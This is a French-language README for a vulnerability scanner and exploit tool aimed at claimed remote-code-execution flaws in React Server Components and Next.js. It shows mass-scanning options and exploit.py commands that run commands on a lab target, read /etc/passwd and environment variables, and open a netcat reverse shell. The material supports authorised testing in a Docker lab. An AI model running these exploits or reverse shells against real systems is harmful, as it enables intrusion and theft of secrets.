
React2shell-web-scanner
Scanner de vulnérabilités haute fidélité pour CVE-2025-55182 et CVE-2025-66478 - Vulnérabilités d'exécution de code à distance dans les composants serveur React / Next.js.
📖 Pour une analyse technique détaillée, les mécanismes d'exploitation et les données IOC, voir SECURITY-RESEARCH.md
Cet outil est fourni UNIQUEMENT À DES FINS ÉDUCATIVES ET DE TEST DE SÉCURITÉ AUTORISÉS. L'accès non autorisé à des systèmes informatiques est illégal. Utilisez ces outils uniquement sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation écrite explicite de tester. Les auteurs déclinent toute responsabilité en cas d'utilisation abusive.
| CVE | Description | CVSS |
|---|---|---|
| CVE-2025-55182 | Désérialisation non sécurisée des composants serveur React menant à une RCE | 9.8 Critique |
| CVE-2025-66478 | RCE via les actions serveur Next.js | 9.8 Critique |
Paquets concernés :
react-server-dom-webpack : 19.0.0, 19.1.0, 19.1.1, 19.2.0react-server-dom-turbopack : 19.0.0, 19.1.0, 19.1.1, 19.2.0react-server-dom-parcel : 19.1.0, 19.1.1, 19.2.0Versions corrigées :
# Aucune installation nécessaire - uv gère les dépendances
uv run react2shell-scanner -u https://example.com
pip install requests tqdm dnspython
python3 react2shell-scanner -u https://example.com
# URL unique
python3 react2shell-scanner -u https://example.com
# Mode sécurisé (sans exécution de RCE)
python3 react2shell-scanner -u https://example.com --safe-check
# Depuis un fichier d'hôtes
python3 react2shell-scanner -l targets.txt -t 50 -o results.json
# Plage CIDR
python3 react2shell-scanner --cidr 192.168.1.0/24 --ports 80,443,3000
# Plusieurs plages CIDR
python3 react2shell-scanner --cidr 10.0.0.0/24 --cidr 172.16.0.0/24
# Énumération de sous-domaines
python3 react2shell-scanner -u example.com --enumerate-subdomains
# Dictionnaire personnalisé de sous-domaines
python3 react2shell-scanner -u example.com --enumerate-subdomains \
--subdomain-wordlist "app,api,admin,portal,staging"
# Chemins personnalisés
python3 react2shell-scanner -u https://example.com \
--path / --path /_next --path /api
# Ignorer l'empreinte (scanner tout)
python3 react2shell-scanner -l targets.txt --skip-fingerprint --force-scan
# Mode verbeux avec SSL désactivé
python3 react2shell-scanner -u https://example.com -k -v
# Téléverser les résultats vers Phoenix
python3 react2shell-scanner -l targets.txt \
--upload-phoenix \
--phoenix-config .phoenix.config
# Mode débogage (sauvegarder les charges utiles)
python3 react2shell-scanner -l targets.txt \
--upload-phoenix \
--debug
# Téléverser tous les résultats (pas seulement les vulnérabilités)
python3 react2shell-scanner -l targets.txt \
--upload-phoenix \
--all-results
Créez .phoenix.config :
[phoenix]
client_id = votre_id_client_ici
client_secret = votre_secret_client_ici
api_base_url = https://api.demo.appsecphx.io
assessment_name = Scanner React2Shell - Vulnérabilités Web
import_type = new
Ou utilisez des variables d'environnement :
export PHOENIX_CLIENT_ID=votre_id_client
export PHOENIX_CLIENT_SECRET=votre_secret_client
export PHOENIX_API_URL=https://api.demo.appsecphx.io
export PHOENIX_ASSESSMENT_NAME="Scanner React2Shell"
Un environnement de test basé sur Docker est inclus. Voir Lab-instructions-sample.md pour une référence rapide.
# Démarrer le laboratoire
cd test-lab/lab
docker-compose up -d
# Services :
# - Vulnérable : http://localhost:3011
# - Corrigé : http://localhost:3012
# Tester l'instance vulnérable (collecte de preuves sécurisée)
python3 react2shell-scanner -u http://localhost:3011 -o evidence.json -e
# Tester l'instance corrigée
python3 react2shell-scanner -u http://localhost:3012 -o evidence.json -e
# Lancer la démo complète
./test-and-demo.sh --full-demo
⚠️ Remarque : Les commandes d'exploitation (par exemple,
exploit.py -c "whoami") déclenchent une VÉRITABLE RCE. Utilisez-les uniquement sur des conteneurs Docker locaux à des fins de recherche.
Exécutez des commandes sur des cibles vulnérables. Nécessite Python 3.11+
cd test-lab
pip3.11 install -r requirements.txt
# Ou : pip3.11 install rich-click fake-useragent rich requests
# Exécution de commande de base
python3.11 exploit.py -u http://localhost:3011 -c "whoami"
# Sortie : nextjs
python3.11 exploit.py -u http://localhost:3011 -c "id"
# Sortie : uid=1001(nextjs) gid=65533(nogroup) groups=65533(nogroup)
python3.11 exploit.py -u http://localhost:3011 -c "hostname"
# Sortie : 99e28775bf80 (ID du conteneur)
# Énumération du système
python3.11 exploit.py -u http://localhost:3011 -c "uname -a"
python3.11 exploit.py -u http://localhost:3011 -c "cat /etc/passwd"
python3.11 exploit.py -u http://localhost:3011 -c "env | head -20"
# Reconnaissance de l'application
python3.11 exploit.py -u http://localhost:3011 -c "pwd"
# Sortie : /app
python3.11 exploit.py -u http://localhost:3011 -c "ls -la"
python3.11 exploit.py -u http://localhost:3011 -c "cat package.json"
python3.11 exploit.py -u http://localhost:3011 -c "node --version"
# Informations réseau
python3.11 exploit.py -u http://localhost:3011 -c "cat /etc/hosts"
python3.11 exploit.py -u http://localhost:3011 -c "netstat -an | head -20"
# Énumération des processus
python3.11 exploit.py -u http://localhost:3011 -c "ps aux"
# Obtenir la passerelle du réseau Docker
GATEWAY=$(docker network inspect lab_react-rsc-lab --format '{{range .IPAM.Config}}{{.Gateway}}{{end}}')
# Démarrer l'écouteur (dans un autre terminal)
nc -lvnp 4444
# Lancer le shell inversé
python3.11 exploit.py -u http://localhost:3011 -r -l $GATEWAY -p 4444 -P nc-mkfifo
# Types de charge utile disponibles : nc, nc-mkfifo, sh, bash, perl
| Option | Description |
|---|---|
-u, --url | URL cible (obligatoire) |
-c, --cmd | Commande à exécuter |
-r, --reverse | Activer le mode shell inversé |
-l, --lhost | Hôte écouteur pour le shell inversé |
-p, --lport | Port écouteur pour le shell inversé |
-P, --payload | Type de charge utile : nc, nc-mkfifo, sh, bash, perl |
--timeout | Délai d'attente de la requête (défaut : 10s) |